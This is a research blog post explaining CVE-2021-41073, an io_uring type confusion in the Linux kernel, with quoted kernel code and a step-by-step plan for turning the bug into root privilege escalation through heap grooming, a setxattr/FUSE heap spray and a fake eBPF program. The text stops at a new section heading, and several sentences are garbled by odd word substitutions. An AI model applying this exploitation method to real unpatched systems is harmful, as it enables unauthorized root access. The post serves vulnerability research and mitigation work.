Put an io_uring on it: Exploiting the Linux Kernel

By: Valentina Palmiotti, @chompie1337

At Grapl we believe that in order to build the best defensive system we need to deeply understand attacker behaviors. As part of that goal we're investing in offensive security research. Keep up with our blog for new research on high risk vulnerabilities, exploitation, and advanced threat tactics.

This blog post covers io_uring, a new Linux kernel system call interface, and how I exploited it for local privilege escalation (LPE).

A breakdown of the topics and questions discussed:

  • What is io_uring? Why is it used?
  • What is it used for?
  • How does it work?
  • How do I use it?
  • Discovering a vulnerability to exploit, CVE-2021-41073 [13].
  • Turning a type confusion vulnerability into memory corruption.
  • Linux kernel memory fundamentals and tracking.
  • Exploring the io_uring codebase for tools to construct exploit primitives.
  • Creating new Linux kernel exploitation techniques and modifying existing ones.
  • Finding target objects in the Linux kernel for exploit primitives.
  • Mitigations and considerations to make exploitation harder in the future.

Like my last post, I had no knowledge of io_uring when starting this project. This blog post will document the journey of tackling an unfamiliar part of the Linux kernel and ending up with a working exploit. My hope is that it will be useful to those interested in binary exploitation or kernel hacking and demystify the process. I also break down the different challenges I faced as an exploit developer and evaluate the practical effect of current exploit mitigations.

io_uring: What is it?

Put simply, io_uring is a system call interface for Linux. It was first introduced in upstream Linux kernel version 5.1 in 2019 [1]. It enables an application to initiate system calls that can be performed asynchronously. Initially, io_uring just supported simple I/O system calls like read() and write(), but support for more is continually growing, and rapidly. It may eventually have support for most system calls [5].

Why is it Used?

The motivation behind io_uring is performance. Although it is still relatively new, its performance has improved quickly over time. Just last month, the creator and lead developer Jens Axboe boasted 13M per-core peak IOPS [2]. There are a few key design elements of io_uring that reduce overhead and boost performance.

With io_uring, system calls can be completed asynchronously. This means an application thread does not have to block while waiting for the kernel to complete the system call. It can simply submit a request for a system call and retrieve the results later; no time is wasted by blocking.

Additionally, batches of system call requests can be submitted all at once. A task that would normally require multiple system calls can be reduced down to just one. There is even a new feature that can reduce the number of system calls down to zero [7]. This vastly reduces the number of context switches from user space to kernel and back. Each context switch adds overhead, so reducing them has performance gains.

In io_uring, the bulk of the communication between the user space application and the kernel is done via shared buffers. This removes a large amount of overhead when performing system calls that transfer data between kernel and user space. For this reason, io_uring can be a zero-copy system [4].

There is also a feature for "fixed" files that can improve performance. Before a read or write operation can occur with a file descriptor, the kernel must take a reference to the file. Because the file reference is taken atomically, this causes overhead [6]. With a fixed file, this reference is held open, eliminating the need to take the reference for every operation.

The overhead of blocking, context switches, or copying bytes may not be noticeable in most cases, but in high performance applications it can start to matter [8]. It is also worth noting that system call performance has regressed after workaround patches for Spectre and Meltdown, so reducing system calls can be an important optimization [9].

What is it Used for?

As noted above, high performance applications can benefit from using io_uring. It can be particularly useful for applications that are server/backend related, where a significant proportion of the application time is spent waiting on I/O.

How Do I Use it?

Initially, I intended to use io_uring by making io_uring system calls directly (similar to what I did for eBPF). This is a pretty arduous endeavor, as io_uring is complex and the user space application is responsible for a lot of the work to get it to function properly. Instead, I did what a real developer would do if they wanted their application to make use of io_uring: use liburing.

liburing is the user space library that provides a simplified API to interface with the io_uring kernel component [10]. It is developed and maintained by the lead developer of io_uring, so it is kept up to date as things change on the kernel side.

One thing to note: io_uring does not implement versioning for its structures [11]. So if an application uses a new feature, it first needs to check whether the kernel of the system it is running on supports it. Luckily, the io_uring_setup system call returns this information [12].

Because of the fast rate of development of both io_uring and liburing, the available documentation is out of date and incomplete. Code snippets and examples found online are inconsistent because new functions render the old ones obsolete (unless you already know io_uring very well, and want more low level control). This is a typical problem for OSS, and is not an indicator of the quality of the library, which is very good. I'm noting it here as a warning, because I found the initial process of using it somewhat confusing. Oftentimes I saw fundamental behavior changes across kernel versions that were not documented.

For a fun example, check out this blog post where the author created a server that performs zero syscalls per request [3].

How Does it Work?

As its name suggests, the central part of the io_uring model is a pair of ring buffers that live in memory shared by user space and the kernel. An io_uring instance is initialized by calling the io_uring_setup syscall. The kernel will return a file descriptor, which the user space application will use to create the shared memory mappings.

The mappings that are created:

  • The submission queue (SQ), a ring buffer, where the system call requests are placed.
  • The completion queue (CQ), a ring buffer, where completed system call requests are placed.
  • The submission queue entries (SQE) array, of which the size is chosen during setup.

Mappings are created to share memory between user space and kernel

An SQE is filled out and placed in the submission queue ring for every request. A single SQE describes the system call operation that should be performed. The kernel is notified there is work in the SQ when the application makes an io_uring_enter system call. Alternatively, if the IORING_SETUP_SQPOLL feature is used, a kernel thread is created to poll the SQ for new entries, eliminating the need for the io_uring_enter system call.

An application submitting a request for a read operation to io_uring

When completing each SQE, the kernel will first determine whether it will execute the operation asynchronously. If the operation can be done without blocking, it will be completed synchronously in the context of the calling thread. Otherwise, it is placed in the kernel async work queue and is completed by an io_wrk worker thread asynchronously. In both cases the calling thread won't block; the difference is whether the operation will be completed immediately by the calling thread or later by an io_wrk thread.

When the operation is complete, a completion queue entry (CQE) is placed in the CQ for every SQE. The application can poll the CQ for new CQEs. At that point the application will know that the corresponding operation has been completed. SQEs can be completed in any order, but can be linked to each other if a certain completion order is needed.
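To make the two-ring model concrete, here is a minimal user space sketch of a power-of-two ring indexed by free-running head and tail counters, which is the general shape of both the SQ and the CQ. The toy_ring type and its functions are hypothetical names made up for illustration. The real rings live in memory shared with the kernel and need memory barriers around head and tail updates, which this single-threaded sketch leaves out.

```c
#include <stdint.h>

#define TOY_RING_ENTRIES 8u                    /* must be a power of two */
#define TOY_RING_MASK    (TOY_RING_ENTRIES - 1u)

/* Hypothetical stand-in for an SQ or CQ: one producer, one consumer. */
struct toy_ring {
    uint32_t head;                             /* advanced by the consumer */
    uint32_t tail;                             /* advanced by the producer */
    uint64_t slots[TOY_RING_ENTRIES];          /* payload, e.g. a request tag */
};

/* Producer side: returns 0 on success, -1 if the ring is full. */
static int toy_ring_push(struct toy_ring *r, uint64_t value)
{
    if (r->tail - r->head == TOY_RING_ENTRIES)
        return -1;
    r->slots[r->tail & TOY_RING_MASK] = value; /* mask maps counter to slot */
    r->tail++;
    return 0;
}

/* Consumer side: returns 0 and stores the entry, -1 if the ring is empty. */
static int toy_ring_pop(struct toy_ring *r, uint64_t *value)
{
    if (r->head == r->tail)
        return -1;
    *value = r->slots[r->head & TOY_RING_MASK];
    r->head++;
    return 0;
}
```

In this picture the application is the producer for the SQ and the consumer for the CQ, and the kernel plays the opposite role on each ring.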

Now that we have a good background on io_uring and how it works, we can move on to discussing the vulnerability.

Discovering a Vulnerability

Why io_uring?

Before diving into the vulnerability, I'll give context on my motivations for looking at io_uring in the first place. A question I get asked often is, "How do I pick where to reverse engineer/look for bugs/exploit etc.?". There is no one-size-fits-all answer to this question, but I can give insight on my reasoning in this particular case.

I became aware of io_uring while doing research on eBPF. These two subsystems are often mentioned together because they both change how user space applications interact with the Linux kernel. I am keen on Linux kernel exploitation, so this was enough to pique my interest. Once I saw how quickly io_uring was growing, I knew it would be a good place to look. The old adage is true: new code means new bugs. When writing in an unsafe programming language like C, which is what the Linux kernel is written in, even the best and most experienced developers make mistakes [16].

Additionally, new Android kernels now ship with io_uring. Because this feature is not inherently sandboxed by SELinux, it is a good source of bugs that could be used for privilege escalation on Android devices.

To summarize, I chose io_uring based on these factors:

  • It's a new subsystem of the Linux kernel, which I have experience exploiting.
  • It introduces a lot of new ways that an unprivileged user can interact with the kernel.
  • New code is being introduced quickly.
  • Exploitable bugs have already been found in it.
  • Bugs in io_uring can be used to exploit Android devices (these are rare, Android is well sandboxed).

The Vulnerability

As I mentioned previously, io_uring is growing quickly, with many new features being added.

One such feature is IORING_OP_PROVIDE_BUFFERS, which allows the application to register a pool of buffers the kernel can use for operations.

Because of the asynchronous nature of io_uring, selecting a buffer for an operation can get complicated. Because the operation won't be completed for an indefinite amount of time, the application needs to keep track of which buffers are currently in flight for a request. This feature saves the application the trouble of having to manage this, and lets it treat buffer selection as automatic.

The buffers are grouped by a group ID, buf_group, and a buffer ID, bid. When submitting a request, the application indicates that a provided buffer should be used by setting the flag IOSQE_BUFFER_SELECT and specifies the group ID. When the operation is complete, the bid of the buffer used is passed back via the CQE [14].
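As a rough illustration of how the bid travels back in the CQE, the sketch below packs and unpacks a buffer ID in a 32-bit flags word. The TOY_ constants are local copies that I believe match the io_uring UAPI values IORING_CQE_F_BUFFER and IORING_CQE_BUFFER_SHIFT; treat them as assumptions and use the definitions from the kernel headers in real code. The function names are hypothetical.

```c
#include <stdint.h>

/* Assumed to mirror IORING_CQE_F_BUFFER and IORING_CQE_BUFFER_SHIFT. */
#define TOY_CQE_F_BUFFER     (1u << 0)
#define TOY_CQE_BUFFER_SHIFT 16

/* Kernel side of the picture: fold the buffer ID into the CQE flags. */
static uint32_t toy_encode_cflags(uint16_t bid)
{
    return ((uint32_t)bid << TOY_CQE_BUFFER_SHIFT) | TOY_CQE_F_BUFFER;
}

/*
 * Application side: recover the buffer ID from the CQE flags.
 * Returns -1 when the completion did not use a provided buffer.
 */
static int toy_decode_bid(uint32_t cqe_flags)
{
    if (!(cqe_flags & TOY_CQE_F_BUFFER))
        return -1;
    return (int)(cqe_flags >> TOY_CQE_BUFFER_SHIFT);
}
```

An application would apply the decode step to the flags field of each CQE it reaps, then look up the buffer it registered under that ID.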

I decided to play around with this feature after I saw the advisory for CVE-2021-3491, a bug in this same feature found by Billy Jheng Bing-Jhong [15]. My intention was to try to recreate a crash with this bug, but I was never able to get this feature to work quite right on the user space side. Fortunately, I decided to keep looking at the kernel code anyway, where I found another bug.

When registering a group of provided buffers, the io_uring kernel component allocates an io_buffer structure for each buffer. These are stored in a linked list that contains all the io_buffer structures for a given buf_group.

struct io_buffer {
        struct list_head list;
        __u64 addr;
        __u32 len;
        __u16 bid;
};

Each request has an associated io_kiocb structure, where information is stored to be used during completion. In particular, it contains a field named rw, which is an io_rw structure. This stores information about r/w requests:

struct io_rw {
        struct kiocb                       kiocb;
        u64                                addr;
        u64                                len;
};

If a request is submitted with IOSQE_BUFFER_SELECT, the function io_rw_buffer_select is called before the read or write is performed. Here is where I noticed something strange.

static void __user *io_rw_buffer_select(struct io_kiocb *req, size_t *len,
                                        bool needs_lock)
{
        struct io_buffer *kbuf;
        u16 bgid;

        kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
        bgid = req->buf_index;
        kbuf = io_buffer_select(req, len, bgid, kbuf, needs_lock);
        if (IS_ERR(kbuf))
                return kbuf;
        /* The kernel pointer to the io_buffer is stored in rw.addr. */
        req->rw.addr = (u64) (unsigned long) kbuf;
        req->flags |= REQ_F_BUFFER_SELECTED;
        return u64_to_user_ptr(kbuf->addr);
}

Here, the pointer for the request's io_kiocb structure is called req. In the assignment to req->rw.addr near the end of the function, the io_buffer pointer for the selected buffer is stored in req->rw.addr. This is strange, because this is where the (user space) target address for reading/writing is supposed to be stored! And here it is being filled with a kernel address…

It turns out that if a request is sent using the IOSQE_BUFFER_SELECT flag, the flag req->flags & REQ_F_BUFFER_SELECT is set on the kernel side. Requests with this flag are handled slightly differently in certain spots in the code. Instead of using req->rw.addr for the user space address, (io_buffer*) kbuf.addr is used.

Using the same field for user and kernel pointers seems dangerous. Are there any spots where the REQ_F_BUFFER_SELECT case was forgotten and the two types of pointer were confused?

I looked in places where read/write operations were being done. My hope was to find a bug that gives a kernel write with user controllable data. I had no such luck: I didn't see any places where the address stored in req->rw.addr would be used to do a read/write if REQ_F_BUFFER_SELECT is set. However, I still managed to find a confusion of lesser severity in the function loop_rw_iter:

/*
 * For files that don't have ->read_iter() and ->write_iter(), handle them
 * by looping over ->read() or ->write() manually.
 */
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
        struct kiocb *kiocb = &req->rw.kiocb;
        struct file *file = req->file;
        ssize_t ret = 0;

        /*
         * Don't support polled IO through this interface, and we can't
         * support non-blocking either. For the latter, this just causes
         * the kiocb to be handled from an async context.
         */
        if (kiocb->ki_flags & IOCB_HIPRI)
                return -EOPNOTSUPP;
        if (kiocb->ki_flags & IOCB_NOWAIT)
                return -EAGAIN;

        while (iov_iter_count(iter)) {
                struct iovec iovec;
                ssize_t nr;

                if (!iov_iter_is_bvec(iter)) {
                        iovec = iov_iter_iovec(iter);
                } else {
                        iovec.iov_base = u64_to_user_ptr(req->rw.addr);
                        iovec.iov_len = req->rw.len;
                }

                if (rw == READ) {
                        nr = file->f_op->read(file, iovec.iov_base,
                                              iovec.iov_len, io_kiocb_ppos(kiocb));
                } else {
                        nr = file->f_op->write(file, iovec.iov_base,
                                               iovec.iov_len, io_kiocb_ppos(kiocb));
                }

                if (nr < 0) {
                        if (!ret)
                                ret = nr;
                        break;
                }
                ret += nr;
                if (nr != iovec.iov_len)
                        break;
                req->rw.len -= nr;
                /* Advanced unconditionally, even when it holds a kernel pointer. */
                req->rw.addr += nr;
                iov_iter_advance(iter, nr);
        }

        return ret;
}

For each open file descriptor, the kernel keeps an associated file structure, which contains a file_operations structure, f_op. This structure holds pointers to functions that perform various operations on the file. As the description for loop_rw_iter states, if the type of file being operated on doesn't implement the read_iter or write_iter operation, this function is called to do an iterative read/write manually. This is the case for /proc filesystem files (like /proc/self/maps, for example).

The first part of the offending function performs the proper checks. At the top of the loop body, the iter structure is checked with iov_iter_is_bvec: if REQ_F_BUFFER_SELECT is set then iter is not a bvec, otherwise req->rw.addr is used as the base address for read/write.

The bug is in the statement req->rw.addr += nr. As the function name suggests, the purpose is to perform an iterative read/write in a loop. At the end of the loop, the base address is advanced by the size in bytes of the read/write just performed. This is so the base address points to where the last r/w left off, in case another iteration of the loop is needed. For the case of REQ_F_BUFFER_SELECT, the base address is advanced by calling iov_iter_advance on the following line. No check is performed like in the beginning of the function: both addresses are advanced. This is a type confusion, because the code treats the address in req->rw.addr as if it were a user space pointer.

Remember, if REQ_F_BUFFER_SELECT is set, then req->rw.addr is a kernel address and points to the io_buffer used to represent the selected buffer. This doesn't really affect anything during the operation itself, but after it is completed, the function io_put_rw_kbuf is called:

static inline unsigned int io_put_rw_kbuf(struct io_kiocb *req)
{
        struct io_buffer *kbuf;

        if (likely(!(req->flags & REQ_F_BUFFER_SELECTED)))
                return 0;
        kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
        return io_put_kbuf(req, kbuf);
}

In io_put_rw_kbuf, the request's flags are first checked for REQ_F_BUFFER_SELECTED. If it is set, the function io_put_kbuf is called with req->rw.addr as the kbuf parameter. The code for this called function is below:

static unsigned int io_put_kbuf(struct io_kiocb *req, struct io_buffer *kbuf)
{
        unsigned int cflags;

        cflags = kbuf->bid << IORING_CQE_BUFFER_SHIFT;
        cflags |= IORING_CQE_F_BUFFER;
        req->flags &= ~REQ_F_BUFFER_SELECTED;
        kfree(kbuf);
        return cflags;
}

io_put_kbuf ends by calling kfree on kbuf (whose value is the address in req->rw.addr). Since this pointer was advanced by the size of the read/write performed, the originally allocated buffer isn't the one being freed! Instead, what effectively happens is:

kfree(kbuf + user_controlled_value);

where user_controlled_value is the size of the completed read or write.
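The arithmetic can be sketched in plain C. Because the advance happens on the u64 field req->rw.addr, the offset is in bytes rather than in units of struct io_buffer. The helper names and the example address used in the note below are hypothetical; the 32-byte object size is the io_buffer size stated in this post.

```c
#include <stdint.h>

#define TOY_IO_BUFFER_SIZE 32u   /* sizeof(struct io_buffer), per the text */

/* Address that ends up being passed to kfree after bytes_done bytes of I/O. */
static uint64_t toy_freed_addr(uint64_t kbuf_addr, uint64_t bytes_done)
{
    return kbuf_addr + bytes_done;
}

/*
 * Number of 32-byte slots between the original io_buffer and the address
 * that is freed, or -1 if the freed address is not on a slot boundary.
 */
static int64_t toy_slot_distance(uint64_t bytes_done)
{
    if (bytes_done % TOY_IO_BUFFER_SIZE != 0)
        return -1;
    return (int64_t)(bytes_done / TOY_IO_BUFFER_SIZE);
}
```

For example, with an io_buffer at the made-up address 0xffff888000001000, a completed 32-byte read would lead to a free of 0xffff888000001020, one slot further along.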

Since an io_buffer structure is 32 bytes, we effectively gain the ability to free buffers in the kmalloc-32 cache at a controllable offset from our originally allocated buffer. I'll talk a little bit more about Linux kernel memory internals in the next section, but the diagram below gives a visual of the bug:


The previous section covered the vulnerability; now it's time to construct an exploit. For those who want to skip right to the exploit strategy, it is as follows:

  • Set the affinity of the application's threads and iou_wrk threads to the same CPU core, so they both use the same kmalloc-32 cache slab.
  • Spray the kmalloc-32 cache with io_buffer structures to drain all partially free slabs. Subsequent 32 byte allocations will be contiguous in a freshly allocated slab page. Now the vulnerability can be utilized as a use-after-free primitive.
  • The use-after-free primitive can be used to construct a universal object leaking and overwriting primitive.
  • Use the object leaking primitive to leak the contents of an io_tctx_node structure, which contains a pointer to a task_struct of a thread belonging to our process.
  • Use the object leaking primitive to leak the contents of a seq_operations structure to break KASLR.
  • Use the object spray primitive to allocate a fake bpf_prog structure.
  • Use the object leaking primitive to leak the contents of an io_buffer, which contains a list_head field. This leaks the address of the controllable portion of the heap, which in turn gives the address of the fake bpf_prog.
  • Use the object overwriting primitive to overwrite a sk_filter structure. This object contains a pointer to the corresponding eBPF program attached to a socket. Replace the existing bpf_prog pointer with the fake one.
  • Write to the attached socket to trigger the execution of the fake eBPF program, which is used to escalate privileges. The leaked task_struct is used to retrieve the pointer to the cred structure of our process and overwrite uid and euid.

Constructing Primitives

The first step is to create the exploit primitives. An exploit primitive is a generic building block for an exploit. An exploit will often use multiple primitives together to achieve its goal (code execution, privilege escalation, etc.). Some primitives are better than others. For example, arbitrary read and arbitrary write are very strong primitives. The ability to read and write at any address is usually enough to achieve whatever the exploit goal is.

In this case, the initial primitive we have is pretty weak. We can free a kernel buffer at an offset we control. But we don't actually know anything about where the buffer is or what is around it. It will take some creativity to turn it into something useful.

From Type Confusion to Use-After-Free (UAF)

Because we control the freeing of a kernel buffer, it makes the most sense to turn this primitive into a stronger use-after-free primitive. If you aren't familiar with what a use-after-free is, here's the basic idea: A program uses some allocated memory, then somehow (either due to a bug or an exploit primitive) that memory is freed. After it is freed, the attacker triggers the reallocation of the same buffer and the original contents are overwritten. If the program that originally allocated the memory uses it after this occurs, it will be using the same memory, but its contents have been reallocated and used for something else! If we can control the new contents of the memory, we can influence how the program behaves. Essentially, it allows for overwriting an object in memory.

Now, the basic plan is simple: allocate an object, use the bug to free it, then reallocate the memory and overwrite it with controllable data. At this point, I didn't know what kind of object to target. First I needed to try to overwrite any object in the first place.

This turned out to be a good idea, because initially I was not able to reliably trigger the reallocation of the buffer freed by the bug. As shown below, the freed buffer has a different address than the reallocated buffer.

Debugging the exploit in the kernel with printk()

My first inclination was that buffer size had something to do with it. 32 bytes is small, and there are a lot of kernel objects of the same size. Perhaps the race to allocate the freed buffer was lost every time. I tested this by changing the definition of the io_buffer structure in the kernel. After some experimentation with different sizes, I confirmed that buffer size wasn't the problem.

After learning a bit about Linux kernel memory internals and some debugging, I found the answer. You don't need a deep knowledge of Linux kernel memory internals to understand this exploit. However, knowing the general idea of how virtual memory is managed can be important for memory corruption vulnerabilities. I'll give a very basic overview and point out the relevant parts in the next section.

Linux Kernel Memory: SLOB on my SLAB

The Linux kernel has several memory allocators in the code tree, which include: SLOB, SLAB, and SLUB. They are mutually exclusive, so you can only have one of them compiled into the kernel. These allocators represent the memory management layer that works on top of the system's low level page allocator [20].

The Linux kernel currently uses the SLUB allocator by default. For background, I'll give a very brief explanation of how this memory allocator works.

SLUB stores several memory caches that each hold the same type of object or generic objects of similar size.

Each one of these caches is represented by a kmem_cache structure, which holds a list of free objects and a list of slabs. Slabs (not to be confused with SLAB, which is a different Linux kernel memory allocator) consist of one or more pages that are sliced into smaller blocks of memory for allocation. When the list of free objects is empty, a new slab page is allocated. In SLUB, each slab page is associated with a CPU. Each free object contains a metadata header that includes a pointer to the next free object in the cache.
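The freelist idea can be shown with a toy allocator, sketched here under heavy simplification: one fixed "slab" of 32-byte objects, with the next-free pointer stored inside each free object. All names are hypothetical, and real SLUB adds per-CPU state, multiple slabs, and optional freelist hardening and randomization that this sketch ignores.

```c
#include <stddef.h>
#include <string.h>

#define TOY_OBJ_SIZE      32u
#define TOY_OBJS_PER_SLAB 8u

/* Hypothetical single-slab cache; the freelist links live in the free objects. */
struct toy_cache {
    void *freelist;                                   /* most recently freed object */
    unsigned char slab[TOY_OBJ_SIZE * TOY_OBJS_PER_SLAB];
};

/* Read and write the next-free pointer stored at the start of a free object. */
static void *toy_load_next(const void *obj)
{
    void *next;
    memcpy(&next, obj, sizeof(next));
    return next;
}

static void toy_store_next(void *obj, void *next)
{
    memcpy(obj, &next, sizeof(next));
}

/* Link every slot into the freelist so that slot 0 is handed out first. */
static void toy_cache_init(struct toy_cache *c)
{
    c->freelist = NULL;
    for (size_t i = TOY_OBJS_PER_SLAB; i-- > 0; ) {
        void *obj = c->slab + i * TOY_OBJ_SIZE;
        toy_store_next(obj, c->freelist);
        c->freelist = obj;
    }
}

/* Pop the head of the freelist; returns NULL when the slab is exhausted. */
static void *toy_alloc(struct toy_cache *c)
{
    void *obj = c->freelist;
    if (obj)
        c->freelist = toy_load_next(obj);
    return obj;
}

/* Push the object back on the head of the freelist (LIFO reuse). */
static void toy_free(struct toy_cache *c, void *obj)
{
    toy_store_next(obj, c->freelist);
    c->freelist = obj;
}
```

Two properties of this toy matter for what follows: allocations from a fresh slab come out adjacent to each other, and a freed object is the first one handed back out.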

Although it isn't necessary for understanding the rest of this post, if you'd like to know more about the internals of the Linux kernel memory allocators, check out these great blog posts [20] [21] [23] and these slides [22].

Memory Grooming

The first goal is to get contiguously allocated buffers. Given the nature of the bug, the target object for the UAF needs to be at a certain offset from the originating io_buffer, and the offset must be knowable.

We can start by draining the cache's freelist and ensuring that a fresh slab page is allocated. Afterwards, subsequent allocations will be contiguous to each other on the same slab page. We do this by triggering the allocation of many 32 byte objects, which can be done by registering many buffers using io_uring_prep_provide_buffers. Remember, an io_buffer object will be allocated for every buffer registered.

io_uring_prep_provide_buffers(sqe, bufs1, 0x100, 1000, group_id1, 0);

The line of code above triggers the allocation of 1000 32 byte io_buffer structures in the kernel. They will each stay in memory until they are used to complete an io_uring request. This means they can be kept in memory indefinitely.

When the target object is allocated, it will land next to the io_buffer structs that were just sprayed. Luckily, provided buffers for each buf_group are used in Last-In-First-Out (LIFO) order. So, the first io_buffer used for an operation will be the last one that was allocated. Now the offset to the target object is knowable!


The kernel configuration CONFIG_SLAB_FREELIST_RANDOM (which is set in distributions like Ubuntu) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This means allocations on a new slab page may not be contiguous in virtual memory.

This mitigation is annoying, but easily bypassable. The first step is the same: spray to ensure an io_buffer struct lands in a freshly allocated slab page. Then, spray the cache with target objects. This way, there is a high chance of a target object being allocated contiguously to the io_buffer that will trigger the freeing. The randomization only applies to the order in which buffers are added to the freelist; the list itself is still LIFO.


Linux Kernel Memory Tracking

There are a lot of ways to trace Linux kernel memory. I decided to learn at least one of them and chose the kmem event tracing subsystem, which is built using ftrace. I chose it because it seemed like the least amount of effort required. I don't have to write any code, and even one line is too many.

The setup is simple: pass the following in the boot parameters for your kernel: trace_event=kmem:kmalloc,kmem:kmem_cache_alloc,kmem:kfree,kmem:kmalloc_node

and you can trace all memory allocations and frees in the kernel by running: cat /sys/kernel/debug/tracing/trace. To deobfuscate the virtual memory addresses you can add no_hash_pointers to the kernel boot parameters.

Tracing kernel memory

The first, second, and third columns represent the task name, pid, and the CPU ID of the calling thread, respectively. On the first line, you can see the buffer that is freed by the bug in io_put_kbuf (which is inlined into kiocb_done during compilation). On the second line is the attempt to reallocate this freed buffer.

Now, with a basic background on how Linux kernel memory and io_uring work, can you spot the problem?

The buffer is being freed in a thread running on CPU 0 and the reallocation attempt is happening on CPU 1. Now the problem is clear! The completion of the io_uring read request happens asynchronously, so it happens in the context of an io_wrk thread. The reallocation happens in a thread from our process. Remember that cache slab pages are processor specific, so it's important that the free and the reallocation happen on the same CPU.

I already knew, from Jann Horn's research, that sched_setaffinity can be used to pin a thread to run on a specific CPU core [17]. Unfortunately, this only applies to threads from our own application. We also need a way to control the affinity of the io_wrk thread created by the io_uring kernel component.
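For the application's own threads, pinning with sched_setaffinity can look like the minimal sketch below. pin_to_cpu is a hypothetical helper name, and the choice of CPU is left to the caller; this is an illustration of the call, not the exploit's actual code.

```c
#define _GNU_SOURCE
#include <sched.h>

/*
 * Restrict the calling thread to a single CPU.
 * Returns 0 on success, -1 on error (errno is set by sched_setaffinity).
 */
static int pin_to_cpu(int cpu)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    /* A pid of 0 applies the mask to the calling thread. */
    return sched_setaffinity(0, sizeof(set), &set);
}
```

This only affects the thread that calls it, which is why the kernel worker threads need a separate mechanism.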

Exploring io_uring Sides

Because io_uring is performance oriented, I regarded for a characteristic that affords the applying management over the affinity of io_wrk threads. I obtained extraordinarily lucky, as this io_uring characteristic used to be offered a few months prior – appropriate in time for me to abuse it [18]. The exhaust of IORING_REGISTER_IOWQ_AFF, it’s likely you’ll maybe also characteristic the CPU affinity for iou_wrk threads. I will pin the thread from my assignment and the iou_wrk thread to the identical CPU core, the usage of sched_setaffinity and io_uring_register_iowq_aff respectively.

Now the reallocation works as expected:

Now that a reallocation can be triggered reliably, let's figure out what to do with it.

Universal Heap Spray

Once I was able to successfully turn the bug into a UAF, I immediately revisited Vitaly Nikolenko's research. He created a Linux kernel exploit technique for a universal heap spray using the setxattr system call [19].

This universal heap spray technique provides a way to:

  • Allocate an object of any size
  • Control the contents of the object
  • Keep the object in memory indefinitely

The setxattr system call sets the value of an extended attribute associated with a file. When it is executed, the kernel allocates a buffer of a size controlled by the calling user space application (the kvmalloc call below) and copies the user-supplied attribute buffer into it (the copy_from_user call).

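static long
setxattr(struct user_namespace *mnt_userns, struct dentry *d,
         const char __user *name, const void __user *value, size_t size,
         int flags)
{
    int error;
    void *kvalue = NULL;
    char kname[XATTR_NAME_MAX + 1];

    /* ... flag checks and copying of the attribute name elided ... */

    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        /* The allocation size is chosen by the caller. */
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        /* Copies the user buffer; can block on a page fault. */
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
    }
    error = vfs_setxattr(mnt_userns, d, kname, kvalue, size, flags);
out:
    kvfree(kvalue);
    return error;
}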

userfaultfd allows a user space application to handle page faults, something that would otherwise be handled by the kernel. This means that if the memory pointed to by value in the above code is registered with userfaultfd, the copy_from_user call will block until the application resolves the page fault.

Now imagine mapping two adjacent pages of memory, where the second page has a userfaultfd page fault handler set. The value buffer is of size n: n-8 bytes are on the first page and the last 8 bytes are on the second page. The kernel will handle the page fault of the first page and copy n-8 bytes into the kernel buffer. Then, it will block on the last 8 bytes, waiting for user space to resolve the page fault of the second page.

With this technique, an unprivileged application can allocate a kernel object of size n written with n-8 bytes of controllable data, and the object stays in memory indefinitely.
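The address arithmetic behind that layout can be sketched as below. The function names are hypothetical, and the sketch assumes n - 8 is no larger than one page so that the head of the buffer fits entirely on the first page.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Given the address of the second (faulting) page and the buffer size n,
 * return where the buffer must start so that its last `tail` bytes land on
 * the second page and the first n - tail bytes land on the first page.
 */
uintptr_t straddle_start(uintptr_t second_page, size_t n, size_t tail)
{
    assert(tail <= n);
    return second_page - (n - tail);
}

/* Number of bytes that can be copied before the second page is touched. */
size_t bytes_before_block(uintptr_t start, uintptr_t second_page, size_t n)
{
    size_t head = (size_t)(second_page - start);

    return head < n ? head : n;
}
```

For a 32-byte object with the second page at 0x2000, the buffer starts at 0x1fe8, so 24 bytes are copied before the copy stalls on the final 8.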

userfaultfd is out, FUSE is in

The Linux kernel now provides a sysctl knob to disable userfaultfd for unprivileged users, vm.unprivileged_userfaultfd. Most major Linux distributions ship with unprivileged userfaultfd disabled by default.

However, the same primitive can be achieved by an unprivileged user using FUSE [24]. FUSE provides a framework for implementing a filesystem in user space. What does this mean for exploitation? Files on a FUSE filesystem can have their reads and writes forwarded to a user space application. We can block the kernel during copies to or from user space by using a memory mapping of a FUSE file.

Instead of mapping two pages and setting a userfaultfd fault handler on the second page, we make one anonymous mapping and one file mapping, using the addr parameter of mmap to make sure the two pages are contiguous in memory.
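One way to get that contiguous layout is sketched here: reserve two pages anonymously, then map the file over the second page with MAP_FIXED. This is an illustration under assumptions, not the PoC's code; map_anon_then_file is a made-up name, and any file descriptor stands in for the FUSE-backed file.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>
#include <unistd.h>

/*
 * Map one anonymous page followed directly by one page backed by `fd`.
 * Returns the base of the two-page region, or MAP_FAILED on error.
 */
void *map_anon_then_file(int fd, size_t page)
{
    /* Reserve two contiguous pages of address space. */
    char *base = mmap(NULL, 2 * page, PROT_READ | PROT_WRITE,
                      MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (base == MAP_FAILED)
        return MAP_FAILED;

    /* Replace the second page with the file mapping at a fixed address. */
    void *file_page = mmap(base + page, page, PROT_READ | PROT_WRITE,
                           MAP_SHARED | MAP_FIXED, fd, 0);
    if (file_page == MAP_FAILED) {
        munmap(base, 2 * page);
        return MAP_FAILED;
    }
    assert(file_page == (void *)(base + page));
    return base;
}
```

With a FUSE-backed descriptor, the first access to the second page is forwarded to the user space filesystem daemon, which can delay its reply for as long as the kernel copy should stay blocked.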

Universal Object Overwrite

The universal heap spray technique is perfect for use-after-frees. After the object has been freed, setxattr will trigger the allocation of an object of size n, overwrite the first n-8 bytes, and then block. Since we successfully turned the vulnerability into a use-after-free primitive, we'll use this to overwrite arbitrary objects in memory that are allocated from the kmalloc-32 cache.

Universal Heap Leak: A New Technique

